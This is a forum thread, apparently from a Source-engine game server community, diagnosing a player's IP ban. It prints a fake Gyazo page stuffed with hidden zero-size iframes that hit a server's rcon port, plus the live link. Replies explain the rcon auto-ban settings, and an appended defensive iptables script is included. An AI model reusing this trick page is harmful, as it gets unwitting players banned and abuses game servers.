Possible exploit? IP ban people via linking url.

So, the topic might sound odd but I’ve really no idea what happened as communication between myself and the victim is lacking.

He claims he was banned after being sent to this URL while ingame, I’m assuming it was opened via Steam overlay browser since we don’t have any system to open html links via derma etc.

Web page source:






<!DOCTYPE HTML>



<html lang="en">



<head>



<meta http-equiv="Content-Type" content="text/html; charset=utf-8">



<meta name="robots" content="noindex">



<title>897784fb2bbd7ef277bc6772c77c1a86.png</title>



<meta name="viewport" content="width=380"/>



<meta name="apple-itunes-app" content="app-id=625725292">



<meta name="description" content="Gyazo lets you instantly grab the screen and upload the image to the web. You can easily share them on Chat, Twitter, Blog, Tumblr, etc. Available for Windows, Mac and Linux.">



<meta name="keywords" content="Screenshot, Gyazo, Upload, Print Screen,     Tool,    Free">



<meta property="og:title" content="Screenshot by Gyazo"/>



<meta property="og:type" content="image"/>



<meta property="og:url" content="http://gyazo.com/897784fb2bbd7ef277bc6772c77c1a86"/>



<meta property="og:image" content="http://gyazo.com/thumb/897784fb2bbd7ef277bc6772c77c1a86.png"/>



<meta property="fb:page_id" content="227979433880197"/>



<meta property="og:site_name" content="Gyazo"/>



<meta property="og:description" content="Gyazo lets you instantly grab the screen and upload the image to the web."/>






<link rel="stylesheet" href="/public/css/jquery-ui.css?1">



<script type="text/javascript">



      var _gaq = _gaq || [];



      _gaq.push(['_setAccount', 'UA-2827501-10']);



      _gaq.push(['_setDomainName', '.gyazo.com']);



        _gaq.push(['_setCustomVar',1,'UserType','Guest',2]);



            _gaq.push(['_setCustomVar',1,'ImageTopAd','',3]);



            _gaq.push(['_setCustomVar',1,'ImageBottomAd','',3]);



            _gaq.push(['_setCustomVar',1,'ShowDownloadForGuest','true',3]);



              _gaq.push(['_trackPageview']);



      (function() {



        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;



        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';



        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);



      })();







    </script>



</head>



<body>



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<div id="header" style="display: block;">



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<div class="container">



<a class="forguest" href="/?ref=bar">



<div style="float:left;margin:0px 10px 0 4px;">



<img src="http://gyazo.com/public/img/ninja/logo.png" style="width:76px;height:22px" src="/public/img/ninja/logo.png"/>



</div>



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<div style="float:left;padding-top:2px;height:21px;line-height:21px;margin-right:10px;">



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



Instant Screen Sharing. </div>



<div class="dlbtn">



Try Now </div>



</a>



</div>



</div>



<div id="content">



<div id="gyazo">



<a>



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<img src="897784fb2bbd7ef277bc6772c77c1a86.jpg" id="gyazo_img" alt="" onload="try{fitImgPosition();}catch( e ){}"/>



</a>



<ul id="buttons" class="prefix">



<li style="margin-right:0;">



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-text="Screenshot:">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>



</li>



<li>



<div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#appId=176828049042806&xfbml=1"></script><fb:like href="" send="false" layout="button_count" width="80" show_faces="false" font=""></fb:like>



</li>



<li style="margin-top: -2px;">



<a name="fb_share" type="button"></a>



<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript">



                </script>



                <iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



</li>



<li>



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<a href="http://www.reddit.com/submit" onclick="window.location = 'http://www.reddit.com/submit?url=' + encodeURIComponent(window.location); return false"> <img src="http://www.reddit.com/static/spreddit7.gif" alt="submit to reddit" border="0"/> </a>



</li>



<li>



<a href="http://www.tumblr.com/share" title="Share on Tumblr" style="display:inline-block; text-indent:-9999px; overflow:hidden; width:81px; height:20px; background:url('http://platform.tumblr.com/v1/share_1.png') top left no-repeat transparent;" target="_blank">Share on Tumblr</a>



</li>



<li>



<a href="http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fgyazo.com%2F897784fb2bbd7ef277bc6772c77c1a86&media=http%3A%2F%2Fgyazo.com%2F897784fb2bbd7ef277bc6772c77c1a86.png" class="pin-it-button" count-layout="none">Pin It</a>



<script type="text/javascript" src="http://assets.pinterest.com/js/pinit.js"></script>



</li>



<li class="report">



<a href="/report?fname=897784fb2bbd7ef277bc6772c77c1a86">Report this image</a>



</li>



<li class="premium">



<a href="/premium/">Hide Ads?</a>



</li>



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



</ul>



</div>



</div>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js"></script>



<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>



<script>



jQuery( function() {



    jQuery( "#gyazo_img" ).tooltip( {



        items: "img",



        content: function() {



            var element = jQuery( this );



            return element.attr("tooltips");



        },



    track: true



    } );



} );



</script>



<script type="text/javascript" charset="utf-8">



function log(obj){



    try{



        console.log(obj);



    }catch(e){}



}











function toggleVersionup(){



    clear_selection("menu");



    if($('#versionup').css('display')=='none'){



        $('#versionup').show();



                $('#gyazo').css('opacity', "0.5");



                $('#header').css('opacity', "0.5");



    }else{



        $('#versionup').hide();



                $('#gyazo').css('opacity', "1");



                $('#header').css('opacity',"1");



    }



}



function toggleGyazopro(){



    clear_selection("menu");



    if($('#gyazopro').css('display')=='none'){



        $('#gyazopro').show();



                $('#gyazo').css('opacity', "0.5");



                $('#header').css('opacity', "0.5");



    }else{



        $('#gyazopro').hide();



                $('#gyazo').css('opacity', "1");



                $('#header').css('opacity', "1");



    }



}



function hideOther(name){



    var names = 'twitter flickr'.split(' ');



    for(var i=0,l=names.length;i<l;i++){



        if(names[i]!=name) $('#'+names[i]).hide();



    }



}







function clear_selection(id){



    $('#'+id).find("li").each(function(i, e){



        e.className = "";



    });



}











function show_dialog(){



    $('#dialog_frame').show();



    $('#image_header').hide();



    //$('author_tag').focus();



}







function close_dialog(){



    clear_selection("menu");



    hideOther('');



}







function set_tag(tag){



    $('#public_tags')[0].value += tag + ' ';



}











function hide_header(){



    $('#header').hide();



}







function toggleSize(){



    if($('#gyazo_img')[0].style.maxHeight != '600px'){



        $('#gyazo_img')[0].style.maxHeight = '600px';



    }else{



        $('#gyazo_img')[0].style.maxHeight = '400px';



    }



}







function hideNotice(){



    $('#noticebar').hide();



}







function showNotice(){



    $('#noticebar').show();



}







function toggleHeader(){



    if($('#header')[0].style.display == 'block'){



        $('#header').hide();



        $('#content')[0].style.marginTop = '0px';



    }else{



        $('#header').show();



        $('#content')[0].style.marginTop = '53px';



    }



}











var trycount = 0;



var imgobj;







$(function(){







    $(window).keydown(function(e){



        if(e.keyCode == 27){



            close_dialog();



        }



    });



    $('#gyazo_img').click(function(e){



            });







  var pathname_count = location.pathname.length;



  var iphone_dismiss = localStorage.getItem("iphone_dismiss");



  if(iphone_dismiss!=1 && pathname_count!=3) {



  $(".show_iphone").show();



  }



  $(".close_logo").click(function(){



  localStorage.setItem("iphone_dismiss","1");



  $(".show_iphone").hide();







  });







});











function fitImgPosition(){



    var w= $("#gyazo_img").width();



    if (w > 0 && w > 940){



        $("#content").width(w);



    }



}



fitImgPosition();







</script>



</body>




The Link:
WARNING
http://gyazo.org/NzAuNDIuNzQuNjoyNzAxNQ

Looks like the multiple iframes are opening RCON connections and causing a ban.

This is the code in question:


<iframe src="http://70.42.74.6:27015" width="0px" height="0px" seamless="1"></iframe>

Aye, also … why does


 create a table :/

Edit (30th May 2013):

Fixed. It was because you had table tags at the beginning of the code.

This is an old issue with srcds: a TCP listener is opened for rcon, and spamming connections will get you banned if the following settings are proper/enabled:


sv_rcon_banpenalty
sv_rcon_maxfailures
sv_rcon_minfailures
sv_rcon_minfailuretime


There was a user who posted links on my forums to a shitty image hosting site which allowed images to have invalid extensions. (.php, .html, etc.)

The images contained the exact same thing you’re seeing, iframes to spam connections.

You can solve this by limiting tcp connections to a specific IP on 27015. (It’s only needed for rcon and it’s better to have it secured anyway.)

Yeah, take the firewall route here instead of allowing infinite failed connections.

We have external rate limiting set for brute force attempts, but since myself and our other roots have dynamic IPs then it kinda sucks.

The firewall kicks in before the failed hacking attempt auto ban now so it’s not going to be an issue anymore.
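As an added example (not code from the thread), a POSIX shell helper that prints the iptables rules for the firewall fix discussed above: it restricts TCP/27015, the srcds rcon listener, either to an admin allowlist or to a per-source connection rate limit for admins on dynamic IPs, while leaving UDP/27015 game traffic untouched. The port, the `iptables` binary name and the sample admin address 203.0.113.10 are assumptions; the functions only print rules, nothing is applied unless you pipe their output into a root shell.

```shell
#!/bin/sh
# Added example, not from the thread: emit iptables rules that protect the
# srcds rcon TCP listener. Game traffic on UDP/27015 is never touched.

RCON_PORT=27015          # assumption: default srcds port
IPT="iptables"           # assumption: legacy iptables CLI is in use

# rcon_allowlist_rules ADMIN_IP...
# Accept TCP/27015 only from the given admin addresses, drop everyone else,
# so a hidden <iframe src="http://server:27015"> never reaches srcds and
# therefore never counts as a failed rcon authentication.
rcon_allowlist_rules() {
    for ip in "$@"; do
        echo "$IPT -A INPUT -p tcp --dport $RCON_PORT -s $ip -j ACCEPT"
    done
    echo "$IPT -A INPUT -p tcp --dport $RCON_PORT -j DROP"
}

# rcon_ratelimit_rules HITS SECONDS
# For admins on dynamic IPs an allowlist is impractical; instead drop any
# source that opens HITS or more new TCP connections to the rcon port within
# SECONDS. Keep HITS below sv_rcon_minfailures so the firewall trips before
# srcds's own failure counter bans the player.
rcon_ratelimit_rules() {
    hits="$1"; secs="$2"
    echo "$IPT -A INPUT -p tcp --dport $RCON_PORT --syn -m recent --name rcon --set"
    echo "$IPT -A INPUT -p tcp --dport $RCON_PORT --syn -m recent --name rcon --update --seconds $secs --hitcount $hits -j DROP"
}

# rules_leave_udp_alone RULES
# Returns 0 when none of the printed rules match UDP (game traffic).
rules_leave_udp_alone() {
    ! printf '%s\n' "$1" | grep -q -- '-p udp'
}

# Example usage: review the rules before applying them as root.
rcon_allowlist_rules 203.0.113.10
rcon_ratelimit_rules 4 30
```

Apply with `rcon_allowlist_rules 203.0.113.10 | sudo sh` (or the ratelimit variant) once the printed rules look right for your setup.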